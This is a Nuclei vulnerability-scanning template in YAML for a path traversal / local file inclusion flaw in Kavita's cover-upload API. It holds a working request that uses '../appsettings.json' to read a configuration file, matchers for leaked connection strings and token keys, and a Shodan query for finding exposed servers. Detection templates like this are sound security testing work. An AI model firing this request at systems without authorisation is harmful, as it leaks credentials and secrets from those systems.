nuclei-templates/http/vulnerabilities/other/kavita-lfi.yaml

39 lines
944 B
YAML

id: kavita-lfi
info:
name: Kavita - Local File Inclusion
author: arafatansari
severity: high
description: |
Kavita - Path Traversal is vulnerable to local file inclusion via abusing the Path Traversal filename parameter of the /api/image/cover-upload.
reference:
- https://huntr.dev/bounties/2eef332b-65d2-4f13-8c39-44a8771a6f18/
metadata:
max-request: 1
verified: true
shodan-query: http.html:"kavita"
tags: kavita,lfi,huntr
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-22
http:
- method: GET
path:
- '{{BaseURL}}/api/image/cover-upload?filename=../appsettings.json'
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"ConnectionStrings":'
- '"Path":'
- '"TokenKey":'
condition: and
- type: status
status:
- 200